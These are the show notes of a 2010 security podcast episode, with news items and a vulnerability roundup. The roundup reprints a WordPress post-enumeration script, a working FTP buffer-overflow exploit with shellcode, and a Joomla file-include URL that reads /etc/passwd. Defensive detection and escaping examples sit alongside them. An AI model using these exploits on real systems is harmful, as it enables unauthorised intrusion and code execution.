ISD Podcast Episode 74 for February 24, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
- MyHardDriveDied.com
- Scott will be putting on his SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191
- Data Recovery Class April 12th to the 16th in Washington DC. Go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
- Outerzone March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
- Starts early Saturday morning at the Wellesley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
- The next DC404 meeting will be at Outerzone
- SANS Community Atlanta
- SANS Audit 507: Auditing Networks, Perimeter and Systems March 15 – 20, 2010 (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).
Friends of the Podcast:
Webhosting services: WebSpeedway
Vulnerabilities of Interest:
- WordPress is subject to an information-disclosure vulnerability because it fails to properly restrict access to trashed posts. An attacker can exploit this vulnerability to view other authors’ trashed posts, which may aid in further attacks. Versions prior to WordPress 2.9.2 are vulnerable. The following exploit code is available:
#!/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post IDs as an authenticated and unauthenticated user.
# If the responses differ, a 'Trash' post has been found.
#
# You will need an authenticated user cookie of any privilege to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = "www.example.com"
userCookie = "enter_cookie_here"
postID = 0  # Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {"Cookie": userCookie}

print
print "Target = http://" + blogURL + "/?p=" + str(postID)
print

while 1:
    # Start non authenticated enumeration
    request = '/?p=' + str(postID)
    conn.request("GET", request, "")
    try:
        r1 = conn.getresponse()
    except:
        print "Connection error"
    data1 = r1.read()

    # Start authenticated enumeration (same URL, this time with the login cookie)
    conn.request("GET", request, None, Headers)
    try:
        r2 = conn.getresponse()
    except:
        print "Connection error"
    data2 = r2.read()

    # Compare the HTML body responses
    if data1 != data2:
        print "+ Found! http://" + blogURL + request
    else:
        print request
    postID += 1

conn.close()
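From the defender's side, the script above leaves a distinctive trace: one client walking /?p=0, /?p=1, /?p=2 ... with every ID fetched twice. The following is an added example, not from the podcast or the PoC authors, that picks that pattern out of web-server access logs; the log lines and IP addresses are constructed for the demo and the combined-log field layout is an assumption.

```python
# Added example: spot the sequential "/?p=N" walk performed by the PoC above.
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"GET /\?p=(?P<pid>\d+) HTTP/1\.[01]" (?P<status>\d{3})')

# Constructed sample log (combined format assumed). 203.0.113.7 behaves like the PoC:
# each ID is requested twice, once anonymous, once with a cookie; ID 2 answers differently.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Feb/2010:10:00:01 +0000] "GET /?p=0 HTTP/1.1" 404 1021
203.0.113.7 - - [24/Feb/2010:10:00:01 +0000] "GET /?p=0 HTTP/1.1" 404 1021
203.0.113.7 - - [24/Feb/2010:10:00:02 +0000] "GET /?p=1 HTTP/1.1" 200 5532
203.0.113.7 - - [24/Feb/2010:10:00:02 +0000] "GET /?p=1 HTTP/1.1" 200 5532
203.0.113.7 - - [24/Feb/2010:10:00:03 +0000] "GET /?p=2 HTTP/1.1" 404 1021
203.0.113.7 - - [24/Feb/2010:10:00:03 +0000] "GET /?p=2 HTTP/1.1" 200 4410
198.51.100.9 - - [24/Feb/2010:10:05:00 +0000] "GET /?p=7 HTTP/1.1" 200 6000
198.51.100.9 - - [24/Feb/2010:10:06:00 +0000] "GET /?p=12 HTTP/1.1" 200 6100
"""

def parse(log_text):
    """Yield (ip, post_id, status) for each GET /?p=N line; other lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group("ip"), int(m.group("pid")), int(m.group("status"))

def longest_sequential_run(post_ids):
    """Length of the longest run of consecutive integers, in request order."""
    best = run = 1 if post_ids else 0
    for prev, cur in zip(post_ids, post_ids[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best

def flag_enumerators(log_text, min_run=3):
    """IPs that walked /?p=N sequentially, the way the PoC's postID += 1 loop does."""
    seen = defaultdict(list)
    for ip, pid, _ in parse(log_text):
        if not seen[ip] or seen[ip][-1] != pid:  # collapse the PoC's paired requests
            seen[ip].append(pid)
    return sorted(ip for ip, ids in seen.items() if longest_sequential_run(ids) >= min_run)

def differing_responses(log_text):
    """(ip, post_id) pairs where one client got both 404 and 200 for the same ID:
    the anonymous/authenticated difference the PoC keys on, i.e. a likely trashed post."""
    codes = defaultdict(set)
    for ip, pid, status in parse(log_text):
        codes[(ip, pid)].add(status)
    return sorted(k for k, v in codes.items() if {200, 404} <= v)
```

Run over real logs, `differing_responses` also tells you which trashed posts were actually exposed, which is the list to check after upgrading to 2.9.2.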
- UplusFtp (formerly Easy Ftp Server) is subject to multiple remote buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. UplusFtp 1.7.0.12 is vulnerable; prior versions, including Easy Ftp Server, may also be affected. Exploit code is available:
#!/usr/bin/python
# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Author: dookie2000ca
# Date: 14/02/2010
# Found by: loneferret
# Date Found: 13/02/2010
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP3 Professional

import socket
import sys

# msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x2f\x5c' -e x86/shikata_ga_nai -t c
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
shellcode = ("\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93"
"\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f"
"\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04"
"\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb"
"\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e"
"\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6"
"\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21"
"\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11"
"\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a"
"\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5"
"\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21"
"\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69"
"\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36"
"\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5"
"\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b"
"\x1b\x35\x1d")

sled = "\x90" * 10
filler = "\x90" * 30
eip = "\x8B\x38\xAB\x71"  # 71AB388B JMP EBP WS2_32.DLL
trailer = "\x43" * 48

evil = sled + shellcode + filler + eip + trailer

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.1.142', 21))
s.recv(1024)
s.send('USER dookie\r\n')
s.recv(1024)
s.send('PASS dookie\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
- Apache Tomcat is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this issue allows attackers to delete arbitrary files within the context of the current working directory. The following versions are affected: Tomcat 5.5.0 through 5.5.28 and Tomcat 6.0.0 through 6.0.20. An attacker can exploit this issue by deploying a malicious WAR file.
- FUSE (Filesystem in Userspace) is subject to a race-condition vulnerability. A local attacker can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged users. NOTE: For an exploit to succeed, the attacker must be a member of the ‘fuse’ group. Attackers can use standard commands to exploit this issue.
- Todd Miller ‘sudo’ is subject to a local privilege-escalation vulnerability because it fails to correctly handle the ‘sudoedit’ command. Local attackers could exploit this issue to run arbitrary commands as the ‘root’ user. Successful exploits can completely compromise an affected computer. This issue affects ‘sudo’ 1.6.9 through 1.7.2p3. Local attackers can use readily available commands to exploit this issue.
- The Core Design Scriptegrator component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL: http://www.sample.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
- PHP is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. Versions prior to PHP 5.2.12 are vulnerable. PHP code is available:
<?php
// overlong UTF-8 sequence
echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
// invalid Shift_JIS sequence
echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
// invalid EUC-JP sequence
echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
?>
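The mitigation the 5.2.12 fix implements is to refuse input that is not well formed in its declared charset before escaping it (the fixed htmlspecialchars returns an empty string for an invalid code unit sequence). The following is an added example, not from the podcast or the PHP advisory, in Python because the check is about the byte sequences rather than PHP itself: the same seven byte strings from the snippet above are run through a pass-through escaper and through a strict decode-then-escape, with the sample list constructed for the demo.

```python
# Added example: validate the declared charset before HTML-escaping, so the
# malformed sequences from the PHP snippet are rejected instead of reaching the browser.
import html

# Constructed samples: the byte strings the PHP snippet feeds to htmlspecialchars().
SAMPLES = [
    (b"A\xC0\xAF&", "utf-8"),      # overlong UTF-8 encoding of "/"
    (b"B\x80&", "shift_jis"),      # 0x80 is not a lead byte in Shift_JIS
    (b"C\x81\x7f&", "shift_jis"),  # 0x7F is not a valid trail byte
    (b"D\x80&", "euc-jp"),
    (b"E\xA1\xFF&", "euc-jp"),     # 0xFF is never valid in EUC-JP
    (b"F\x8E\xFF&", "euc-jp"),
    (b"G\x8F\xA1\xFF&", "euc-jp"),
]

def naive_escape(raw: bytes) -> str:
    """Approximates the pre-fix behaviour: escape the ASCII metacharacters and
    pass every other byte through untouched, malformed or not."""
    out = raw.replace(b"&", b"&amp;").replace(b"<", b"&lt;").replace(b">", b"&gt;")
    return out.replace(b'"', b"&quot;").replace(b"'", b"&#039;").decode("latin-1")

def strict_escape(raw: bytes, charset: str):
    """Decode strictly in the declared charset first; Python's codecs reject overlong
    UTF-8 and bad Shift_JIS/EUC-JP trail bytes. Return None when the input is not
    well formed (the fixed PHP returns an empty string at the same point)."""
    try:
        text = raw.decode(charset)  # errors="strict" is the default
    except UnicodeDecodeError:
        return None
    return html.escape(text, quote=True)

def audit(samples=SAMPLES):
    """Map each sample to (naive result, strict result) so the difference is visible."""
    return {raw: (naive_escape(raw), strict_escape(raw, cs)) for raw, cs in samples}
```

The browser-side danger is that a lenient decoder may consume the byte after a malformed lead byte, which is why the strict result for every sample here is a rejection rather than a partially escaped string.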
News Items of Interest:
News item 1: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3213469
Intel was targeted by “sophisticated” attacks last month, about the same time that Google reported its network had been breached, allegedly by Chinese hackers.
In its annual report filed on Monday with the US Securities and Exchange Commission (SEC), Intel confirmed that it had been hit in January.
“We regularly face attempts by others to gain unauthorised access through the internet to our information technology systems by, for example, masquerading as authorised users or surreptitious introduction of software,” read the report. “These attempts, which might be the result of industrial or other espionage, or actions by hackers seeking to harm the company, its products, or end users, are sometimes successful. One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicised security incident reported by Google.”
Intel did not reveal whether the attacks had accessed or stolen confidential company information, an admission that Google made last month when it broke the news that it, and other major Western corporations, had been struck by what it called “highly sophisticated and targeted” attacks.
News item 2: http://www.adobe.com/support/security/bulletins/apsb10-08.html
Adobe has fixed a critical vulnerability in Download Manager for the second time in six weeks. The program is used to download the company’s two most popular products, Adobe Reader and Flash Player. The bug, Adobe acknowledged in an advisory, “potentially allow[s] an attacker to download and install unauthorised software onto a user’s system”.
Israeli security researcher Aviv Raff disclosed the vulnerability last week, when he said that attackers could use the Download Manager to forcibly download and install any executable file, including attack code.
“If you go to Adobe’s website to install a security update for Flash, you really expose yourself to a zero-day attack,” Raff said.
Download Manager is not the update mechanism for Reader and Flash Player (that is called Adobe Updater) but instead oversees file transfers from Adobe’s site.
News item 3: http://news.bbc.co.uk/2/hi/business/8533551.stm
The European Commission is looking into complaints about Google’s behaviour, the company has revealed. The complaints were made by UK price comparison site Foundem, French legal search engine ejustice.fr, and Microsoft’s Ciao. Google’s senior competition lawyer Julia Holtz said the internet giant was “confident” it operated within European competition law. Foundem claims that its site is demoted in Google’s search results. “Foundem… argues that our algorithms demote their site in our results because they are a vertical search engine and so a direct competitor to Google,” Google said.
Foundem founder Shivaun Raff said its problems with Google’s rankings were resolved in December 2009, but it was filing the complaint on behalf of other search firms.
News item 4: http://www.scribd.com/doc/25550091/Proj-Grey-Goose-report-on-Critical-Infrastructure-Attacks-Actors-and-Emerging-Threats
Kelly Jackson Higgins reports that attacks against the power grid are likely to rise and intensify during the next 12 months as smart grid research and pilot projects advance, according to utility security experts and a recently published report that analyzes threats to critical infrastructure.
The so-called Project Grey Goose Report on Critical Infrastructure points to state and/or non-state sponsored hackers from the Russian Federation of Independent States, Turkey, and China as the main threats to targeting and hacking into energy providers and other critical infrastructure networks.
Jeffrey Carr, principal investigator for Project Grey Goose and founder and CEO of GreyLogic, says he and other researchers working on the report initially focused on answering the question of whether there have been any successful cyberattacks on the utilities. “Some companies say there’s never been a successful attack against the grid, but that’s not true,” he says. “There have been at least 120 instances” of successful attacks, some of which are documented in the report and date back to 2001.
Several utility security experts agree that utility security administrators will have their hands full during the next year, as the transition from isolated, closed energy-generation and transmission networks to IP-based and wireless ones begins to take shape in the form of pilot smart grid projects.
News item 5:
The Federal Trade Commission (FTC) said it has identified widespread data leaks from businesses, schools and local governments on peer-to-peer (P2P) file-sharing networks.
As a consequence, the FTC recently alerted nearly 100 organizations whose sensitive information, including personal data about customers and employees, is currently residing on P2P networks. The notices were sent to both private and public organizations ranging in size from eight to tens of thousands of employees.
FTC Chairman Jon Leibowitz said in a statement: “For example, we found health-related information, financial records and drivers’ license and Social Security numbers — the kind of information that could lead to identity theft.” The FTC also released educational materials for businesses about the risks of P2P networks and ways to manage them.
News item 6: http://news.cnet.com/8301-13579_3-10457460-37.html?part=rss&subj=news&tag=2547-1_3-0-20
Apple notified developer Chillifresh that its Wobble iBoobs application was being removed from the App Store due to its “overtly sexual” nature. Since then, it appears that Apple has gone on a rampage of sex-oriented app removals.
Chillifresh claimed in a Saturday post that a discussion with Apple revealed that more than 5,000 apps have been affected by its new App Store content policy. Apple said the change was triggered by numerous customer complaints, according to Chillifresh.
Data from iPhone app-tracking Web site AppShopper supports the claim. AppShopper sister site MacRumors on Sunday reported that app removals went from about 100 a day to a high of almost 4,000 on Friday.
Chillifresh said on its Web site that an Apple representative told the developer that under its new App Store policy, it will not accept applications that in any way imply sexual content or include the following:
* images of women in bikinis
* images of men in bikinis
* images of skin
* silhouettes indicating that the app includes sexual images
* sexual connotations or innuendo
* sexually arousing content
Interestingly, some apps that include sexual content, such as Playboy’s, seem to have been missed by the recent purge, so far at least. Doing a search for “girls” on the App Store will bring up a variety of apps with bikini-clad women and others that appear to break the new rules Chillifresh said Apple outlined.